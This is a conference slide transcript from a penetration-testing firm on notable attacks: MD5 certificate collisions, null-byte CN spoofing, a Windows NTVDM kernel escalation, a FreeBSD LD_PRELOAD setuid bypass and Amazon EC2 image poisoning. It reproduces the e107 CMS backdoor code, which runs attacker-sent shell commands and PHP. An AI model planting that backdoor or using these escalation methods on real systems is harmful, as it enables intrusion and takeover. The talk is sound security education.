Attacks and defences Or, really cool hacks


Presentation Transcript


  1. Attacks and defences: Or, really cool hacks • marco@sensepost.com

  2. About Us • pta.za company • +- 20 ppl • Pen-testing for a living • VMS • training • www.sensepost.com • marco@sensepost.com

  3. Why this talk? • Explain a little about recent attacks • Promote security • FLOSS angle? hmmm. FLOSS also insecure? • ZaCon (but only at the end, I promise)

  4. x509 and MD5

  5. x509 attack: MD5 • Security of system rests in the certificate signature • Security of signature lies in the hashing algorithm • (Aside: hash function == one-way function that produces fixed size output. MD5, SHA1, RIPE-MD etc) • If two certificates hash to the same value, then their signatures will be the same

  6. x509 attack: MD5 • Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger • Figured out a way to create two colliding certificates • Then found CAs issuing certs with MD5, with predictable sequence numbers

  7. x509 attack: MD5 • Attack was: • Predict sequence number by purchasing a cert, +1000 • Predict validity times • Create two colliding certificates, one legit and the other evil. Legit cert assumes fixed seq # and validity. • Submit CSR for legit cert • Holds thumbs on the timing/sequence number • Cut-n-paste the signature onto the evil cert

  8. x509 attack: MD5 • Collision attack performed on a cluster of 200 PS3s • Could compute 3 collisions in 72 hours • Cost them $600 in purchased certs • Earned a valid CA cert

  9. x509 and the CN

  10. x509 attack: CN • Moxie Marlinspike loves SSL • He looked into how certs are issued and validated • CSRs use ASN.1 to serialise their data • Strings are prefixed with their length • Most libraries (and by extension browsers) use C functions to validate certs • C strings are terminated by nulls

  11. x509 attack: CN • CN when evaluated in a CSR • CN as seen by a browser

  12. x509 attack: CN • CAs verify the domain from the end • Browsers verify the domain from the front

  13. x509 attack: CN • No explicit ban on disallowed characters in the CN • How about sending a NULL byte in a CSR • www.cs.up.ac.za\0.sensepost.com • CA validates from the end, and if we’re the owner of sensepost.com, then we get back a cert • When victims receive the malicious cert, their libs validate from the beginning, halting at NULL

  14. Validating the cert • Checks performed by the library • Certificate is signed by trusted CA • Validity is fine • CN appears to match hostname • Great!
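As an added example (not code from the talk), the two CN checks side by side in C: the strcmp()-style comparison the slides describe, which stops at the embedded NUL, and a length-aware comparison that uses the ASN.1 length and rejects NUL bytes. The sample CN is the talk's www.cs.up.ac.za\0.sensepost.com, constructed inline; the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable check: copies the ASN.1 CN into a C string and compares with
 * strcmp(), which stops at the first NUL. Everything after an embedded NUL
 * is ignored, so the CN appears to equal the victim's hostname. Returns 1
 * on an (apparent) match. */
int cn_matches_vulnerable(const unsigned char *cn, size_t cn_len, const char *hostname)
{
    char buf[256];
    if (cn_len >= sizeof buf)
        return 0;
    memcpy(buf, cn, cn_len);
    buf[cn_len] = '\0';
    return strcmp(buf, hostname) == 0;
}

/* Hardened check: honours the ASN.1 length, rejects any embedded NUL (never
 * legal in a hostname), and compares every byte. Returns 1 only on an exact match. */
int cn_matches_hardened(const unsigned char *cn, size_t cn_len, const char *hostname)
{
    if (memchr(cn, '\0', cn_len) != NULL)
        return 0;
    if (cn_len != strlen(hostname))
        return 0;
    return memcmp(cn, hostname, cn_len) == 0;
}

/* Constructed sample from the talk: the CN "www.cs.up.ac.za\0.sensepost.com"
 * (30 bytes, NUL included) presented to a client that connected to
 * www.cs.up.ac.za. Returns 1 if the two checks disagree as described. */
int demo(void)
{
    static const unsigned char cn[] = "www.cs.up.ac.za\0.sensepost.com";
    size_t cn_len = sizeof cn - 1;      /* ASN.1 length: excludes the terminator */
    int v = cn_matches_vulnerable(cn, cn_len, "www.cs.up.ac.za");
    int h = cn_matches_hardened(cn, cn_len, "www.cs.up.ac.za");
    printf("strcmp-style check accepts: %d; length-aware check accepts: %d\n", v, h);
    return v == 1 && h == 0;
}

int main(void) { return demo() ? 0 : 1; }
```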

  15. PKI attacks: cert checking • Who was vulnerable? • All NSS-based apps • Firefox • Thunderbird • ... • IE • Bunch of others (Pidgin, AIM, Outlook, Evolution, VPN clients, ...)

  16. PKI attacks: cert checking • More attacks including wildcard certs as well as remote buffer overflows • thoughtcrime.org

  17. Win32 ring3 -> ring0

  18. Win32: privilege escalation • Tavis Ormandy (Google) found a bug in how ‘iret’ was handled on NetBSD <-- he’s a UNIX guy • Poked around on Win32 • Found a related bug in the 8086 simulator on Win32 • Great example of a long-standing bug (*) • Ridiculous exploit • Background...

  19. Win32: 8086 simulator • Win32 supports execution of real-mode code • Simulated environment • Simulated app is run by a monitor, which performs necessary sanity checks. Provides fake interrupt handlers. • In real-mode, apps get to change segment registers which they can’t in protected mode. • Monitor calls into NT kernel when needed, on behalf of the simulated app.

  20. Win32: exploit description • Spawn ‘cmd.exe’, grab handle • Spawn ‘debug.exe’, which inits the NTVDM subsystem incl. monitor • Inject a DLL into the monitor • DLL creates a fake kernel stack • Creates a new VDM context • Inserts a forged trap frame on the real stack, that points to the fake kernel stack • Executes code that generates a #GP trap on ‘iret’ • Handler aborts early, forged frame restored. Control passes to attacker-supplied code. • Code searches for the SYSTEM token and assigns it to the initial ‘cmd.exe’ • Code cleans up completely and returns • cmd.exe is now ‘SYSTEM’

  21. Win32 demo

  22. FreeBSD rtld

  23. FreeBSD: rtld • dynamic linking • environment variables • LD_PRELOAD • LD_PRELOAD=mylib.so ./myproggie • useful: substitute standard calls etc etc • will execute _init() from mylib.so before main() • what about suid programs? • gotta remove dangerous environment variables like LD_PRELOAD

  24. FreeBSD: rtld code
      /* rtld: strip dangerous variables before running a set-uid binary */
      if (suid) {
          /* ... */
          unsetenv("LD_PRELOAD");
          unsetenv("LD_LIBMAP");
          /* ... */
      }

      /* libc: unsetenv() returns early, unsetting nothing, if the merge fails */
      int unsetenv(const char *name) {
          /* ... */
          if (__merge_environ() == -1) {
              return -1;
          }
          /* ... */
          /* unset env variable here */
      }

      /* libc: any environment entry without '=' makes the merge fail */
      int __merge_environ() {
          /* ... */
          if (strchr(*env, '=') == NULL) {
              return -1;
          }
          /* ... */
      }

  25. FreeBSD: rtld • So, executing with a corrupted env means the unsetenv()s will be aborted early, and the linker didn’t check for this • One corrupted environment is: • { “moomoo”, “LD_PRELOAD=mylib.so” } • This skips unsetting of env, but loader will still load the lib • Now for the evilness...
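An added example (not FreeBSD's own code) modelling the rtld/libc interaction in C on a toy environment array: toy_unsetenv() mirrors the excerpted unsetenv() failure, scrub_vulnerable() ignores its return value as the rtld excerpt did, and scrub_hardened() removes LD_* entries without depending on it. The function names and the toy environment are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>
/* Models libc's unsetenv() as excerpted on the slide: the merge pass fails on any
 * entry lacking '=' and returns -1 before anything is removed. env is NULL-terminated. */
static int toy_unsetenv(char **env, const char *name)
{
    size_t n = strlen(name);
    for (char **e = env; *e; e++)
        if (strchr(*e, '=') == NULL)
            return -1;                      /* corrupted env: bail out early */
    for (char **e = env; *e; e++)
        if (strncmp(*e, name, n) == 0 && (*e)[n] == '=') {
            for (char **f = e; *f; f++)     /* shift remaining entries down */
                *f = *(f + 1);
            return 0;
        }
    return 0;
}

/* Vulnerable scrub, as in the rtld excerpt: return values ignored, LD_PRELOAD may survive. */
void scrub_vulnerable(char **env)
{
    toy_unsetenv(env, "LD_PRELOAD");
    toy_unsetenv(env, "LD_LIBMAP");
}

/* Hardened scrub: walk the array itself and drop every LD_* entry, whatever its neighbours. */
void scrub_hardened(char **env)
{
    char **out = env;
    for (char **e = env; *e; e++)
        if (strncmp(*e, "LD_", 3) != 0)
            *out++ = *e;
    *out = NULL;
}

/* Build the talk's corrupted environment { "moomoo", "LD_PRELOAD=mylib.so" },
 * run one scrub, and return 1 if LD_PRELOAD survived it, 0 if it was removed. */
int preload_survives(int hardened)
{
    char *env[] = { "moomoo", "LD_PRELOAD=mylib.so", NULL };
    if (hardened) scrub_hardened(env); else scrub_vulnerable(env);
    for (char **e = env; *e; e++)
        if (strncmp(*e, "LD_PRELOAD=", 11) == 0)
            return 1;
    return 0;
}

int main(void) { printf("survives: vulnerable=%d hardened=%d\n", preload_survives(0), preload_survives(1)); return 0; }
```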

  26. FreeBSD demo

  27. e107 Backdoor

  28. e107 Backdoor • Example of a real-world attack • Popular Open Source CMS • Large community / plugins /themes / blah blah • A blind SQL injection vuln reported in ver 0.7.15 (Nov 3, 2009) • On 25 Jan 2010, a mail appeared on FD

  29. e107: backdoor code
      // Gate: the attacker's secret cookie value, checked against a hard-coded MD5
      if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb")
      {
          // ...
          // run an OS command (execute() is the backdoor's own helper, not shown on the slide)
          if(!empty($_POST['cmd']))
          {
              $out = execute($_POST['cmd']);
          }
          // or eval arbitrary PHP and capture whatever it prints
          elseif(!empty($_POST['php'])){
              ob_start();
              eval($_POST['php']);
              $out = ob_get_contents();
              ob_end_clean();
          }
          // ...
      }

  30. e107 Backdoor • turns out they were owned through the SQLi bug • attackers replaced download link with a link to the backdoored code

  31. Let’s talk cloud computing • (it’s hot right now, isn’t it?)

  32. So, what exactly *is* the cloud?

  33. What drives cloud adoption? • Management by in-flight magazine • Manager Version • Geek Version • Poor history from IT • Economy is down • Cost saving becomes more attractive • Cloud computing allows you to move from CAPEX to OPEX • (Private Clouds?)

  34. Problems with cloud testing • Transparency • Privacy • Compliance • Legal • Vendor Lock-in • Availability

  35. BlackHat talk summary • Attacked SugarSync, SalesForce, Amazon, MobileMe • Not enough time!!! • Amazon it is then...

  36. Yes, it’s that cool...

  37. Amazon EC2 • Elastic Compute Cloud • Provides Xen platform for running virtual machines • Easy (Web interface) • Auto-scales • Cheap • Login, pick VM, boot, go!

  38. Danger • Out of 2700 images, 47 are provided by Amazon • Are all secured equally? • Tested by scanning each VM with Nessus • 1293 Highs • 646 Criticals • Not good • Incompetence aside, what can we ascribe to malice?

  39. Can we get someone to run our machine? • Bundle an image • Register the image (Amazon assigns it an AMI-ID) • Wait for someone to run it • Profit! • Alas... our AMI-ID is too low! • Solution: • do { /*register stuff */ } while (ami-id > threshold)

  40. But there’s more • Our race promoted our strangely named image (qscan) • Let’s make it sexier • fedora - taken • fedora_core - taken • redhat - taken • fedora_core_11 - not taken!

  41. What other cloud hacks? • SugarSync password reset • ClickJacking against SalesForce • Porting Nikto into SalesForce • License stealing from Amazon • Image stealing from Amazon users • Found bugs in MobileMe • In a position to read Steve Wozniak’s mail :) • www.sensepost.com/blog

  42. Linux bugs (it’s TLUG)
